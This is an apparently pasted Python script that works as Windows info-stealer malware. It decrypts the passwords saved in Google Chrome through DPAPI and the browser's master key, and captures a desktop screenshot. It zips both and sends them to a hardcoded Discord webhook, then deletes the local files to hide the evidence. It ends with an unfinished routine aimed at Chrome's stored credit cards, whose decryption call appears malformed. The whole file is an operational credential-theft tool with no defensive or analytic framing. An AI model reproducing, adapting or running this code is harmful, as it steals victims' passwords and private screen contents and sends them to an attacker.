· 5 years ago · Feb 05, 2021, 11:42 PM
1import sys, os, re, json, ctypes, shutil, base64, sqlite3, zipfile, subprocess, cryptography
2if sys.platform.startswith('linux'):
3 exit()
4
5else:
6 pass
7
8
9from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes)
10from cryptography.hazmat.primitives.ciphers.aead import AESGCM
11from cryptography.hazmat.backends import default_backend
12from Crypto.Cipher import AES
13
14
15from dhooks import Webhook, File, Embed, Webhook
16from urllib.request import Request, urlopen
17from subprocess import Popen, PIPE
18from json import loads, dumps
19from base64 import b64decode
20from shutil import copyfile
21from PIL import ImageGrab
22from sys import argv
23
24# WEBHOOK HERE :
25# BELOW IS AN EXAMPLE OF WHAT YOUR WEBHOOK-ID, AND WEBHOOK-TOKEN IS
26# V "webhID" V "webhAT"
27# discord/api/webhooks/000000000000/token
28webhID = "803138051315466260"
29webhAT = "9t0lEhiiLAYYlhZj7VaXN3MOWnD9xG3y5DwzJguSW0QqRGt1CIn9t3tB00XXodt9JWs9"
30
31http = "https"
32disc = "discord"
33webh = "webhooks"
34appl = "api"
35server = f"{http}://{disc}.com/{appl}/{webh}/{webhID}/{webhAT}"
36hook = Webhook(f"{server}")
37
38
39# VARIABLES
40APP_DATA_PATH = os.environ['LOCALAPPDATA']
41DB_PATH = r'Google\Chrome\User Data\Default\Login Data'
42NONCE_BYTE_SIZE = 12
43
44
45def encrypt(cipher, plaintext, nonce):
46 cipher.mode = modes.GCM(nonce)
47 encryptor = cipher.encryptor()
48 ciphertext = encryptor.update(plaintext)
49 return (cipher, ciphertext, nonce)
50
51
52def decrypt(cipher, ciphertext, nonce):
53 cipher.mode = modes.GCM(nonce)
54 decryptor = cipher.decryptor()
55 return decryptor.update(ciphertext)
56
57
58def rcipher(key):
59 cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
60 return cipher
61
62
63def dpapi(encrypted):
64 import ctypes
65 import ctypes.wintypes
66
67 class DATA_BLOB(ctypes.Structure):
68 _fields_ = [('cbData', ctypes.wintypes.DWORD),
69 ('pbData', ctypes.POINTER(ctypes.c_char))]
70
71 p = ctypes.create_string_buffer(encrypted, len(encrypted))
72 blobin = DATA_BLOB(ctypes.sizeof(p), p)
73 blobout = DATA_BLOB()
74 retval = ctypes.windll.crypt32.CryptUnprotectData(
75 ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
76 if not retval:
77 raise ctypes.WinError()
78 result = ctypes.string_at(blobout.pbData, blobout.cbData)
79 ctypes.windll.kernel32.LocalFree(blobout.pbData)
80 return result
81
82
83def localdata():
84 jsn = None
85 with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode="r") as f:
86 jsn = json.loads(str(f.readline()))
87 return jsn["os_crypt"]["encrypted_key"]
88
89
90def decryptions(encrypted_txt):
91 encoded_key = localdata()
92 encrypted_key = base64.b64decode(encoded_key.encode())
93 encrypted_key = encrypted_key[5:]
94 key = dpapi(encrypted_key)
95 nonce = encrypted_txt[3:15]
96 cipher = rcipher(key)
97 return decrypt(cipher, encrypted_txt[15:], nonce)
98
99
100class chromepassword:
101 def __init__(self):
102 self.passwordList = []
103
104
105 def chromedb(self):
106 _full_path = os.path.join(APP_DATA_PATH, DB_PATH)
107 _temp_path = os.path.join(APP_DATA_PATH, 'sqlite_file')
108 if os.path.exists(_temp_path):
109 os.remove(_temp_path)
110 shutil.copyfile(_full_path, _temp_path)
111 self.pwsd(_temp_path)
112
113 def pwsd(self, db_file):
114 conn = sqlite3.connect(db_file)
115 _sql = 'select signon_realm,username_value,password_value from logins'
116 for row in conn.execute(_sql):
117 host = row[0]
118 if host.startswith('android'):
119 continue
120 name = row[1]
121 value = self.cdecrypt(row[2])
122 _info = 'HOST: %s\nNAME: %s\nVALUE: %s\n\n' % (host, name, value)
123 self.passwordList.append(_info)
124 conn.close()
125 os.remove(db_file)
126
127
128 def cdecrypt(self, encrypted_txt):
129 if sys.platform == 'win32':
130 try:
131 if encrypted_txt[:4] == b'\x01\x00\x00\x00':
132 decrypted_txt = dpapi(encrypted_txt)
133 return decrypted_txt.decode()
134 elif encrypted_txt[:3] == b'v10':
135 decrypted_txt = decryptions(encrypted_txt)
136 return decrypted_txt[:-16].decode()
137 except WindowsError:
138 return None
139 else:
140 pass
141
142
143 def saved(self):
144 with open(r'C:\ProgramData\passwords.txt', 'w', encoding='utf-8') as f:
145 f.writelines(self.passwordList)
146
147
148if __name__ == "__main__":
149 main = chromepassword()
150 try:
151 main.chromedb()
152 except:
153 pass
154 main.saved()
155
156
157# DESKTOP SCREENSHOT :
158screen = ImageGrab.grab()
159screen.save(os.getenv('ProgramData') + r'\desktop.jpg')
160screen = open(r'C:\ProgramData\desktop.jpg', 'rb')
161screen.close()
162screenshot = File(r'C:\ProgramData\desktop.jpg')
163
164
165# PASSWORDS > .ZIP :
166zname = r'C:\ProgramData\passwords.zip'
167newzip = zipfile.ZipFile(zname, 'w')
168newzip.write(r'C:\ProgramData\passwords.txt')
169newzip.write(r'C:\ProgramData\desktop.jpg')
170newzip.close()
171passwords = File(r'C:\ProgramData\passwords.zip')
172
173
174# SEND INFORMATION > REMOVE EVIDENCE :
175hook.send("desktop :", file=screenshot)
176hook.send("passwords :", file=passwords)
177os.remove(r'C:\ProgramData\passwords.txt')
178os.remove(r'C:\ProgramData\desktop.jpg')
179os.remove(r'C:\ProgramData\passwords.zip')
180
181
182# GOOGLE CHROME | CREDIT-CARDS :
183def master():
184 try:
185 with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State',
186 "r", encoding='utf-8') as f:
187 local_state = f.read()
188 local_state = json.loads(local_state)
189 except:
190 pass
191 master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
192 master_key = master_key[5:]
193 master_key = ctypes.windll.crypt32.CryptUnprotectData(
194 (master_key, None, None, None, 0)[1])
195 return master_key